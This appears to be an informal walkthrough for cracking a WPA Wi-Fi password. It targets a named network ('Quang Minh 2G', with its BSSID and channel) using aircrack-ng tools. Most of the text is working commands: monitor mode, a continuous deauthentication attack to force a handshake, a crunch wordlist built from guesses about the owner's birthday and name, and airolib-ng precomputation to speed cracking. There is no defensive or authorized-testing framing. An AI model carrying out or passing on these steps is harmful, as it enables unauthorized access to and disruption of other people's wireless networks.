i use tp-link wn725n (chipset rtl8188eus) and parrotOS
connect your card wifi and check
iwconfig
airmon-ng check kill
airmon-ng start <iface>
airodump-ng <iface>
i will choose target is Quang Minh 2G, CH 11, bssid 5C:1A:6F:88:19:19 to monitor close
airodump-ng -c <CH> --bssid <bssid> -w out <iface>
new terminal
aireplay-ng --deauth 0 -a <bssid> <iface>
wait about 5s, return airodump-ng terminal, if you see WPA handshake is okay and Ctrl+C to stop (both)
ls
create passlist
crunch <min> <max> <charset> -t <pattern> -o password.txt
because it's going to be a very, very large file, so i'm going to reveal that
the password is 8 numbers (i think it contains in his birthday) and 1 character (i think it contains in his name)
you can also use Cupp to make such inferences
the output file about 11,5 GB and 1,2 billion passwords
now you can crack wpa with
aircrack-ng -w password.txt out*.cap
or redirect directly from crunch
crunch <min> <max> <charset> -t <pattern> | aircrack-ng -w- out*.cap
add --bssid 5C:1A:6F:88:19:19 if there is some error cann't identify bssid
speed of cracking about 1kp/s at least depend on your hardware processor (normally about 2-3kp/s)
but i will use database to speed up the attack
it will take more time to set up the database (but it will be much faster than regular crack)
you should only use it if you create a permanent database for crack because it will take a long time (or the passlist is not too long)
install sqlite3 sudo apt install sqlite3
create a file essid.txt this write name of target wifi
airolib-ng crackwpa --import passwd password.txt
airolib-ng crackwpa --import essid essid.txt
airolib-ng crackwpa --batch
now crack with database, you will be surprised
aircrack-ng -r crackwpa out*.cap
done! there is the password (crack speed is about 36kp/s)
airmon-ng stop <iface>
service NetworkManager restart
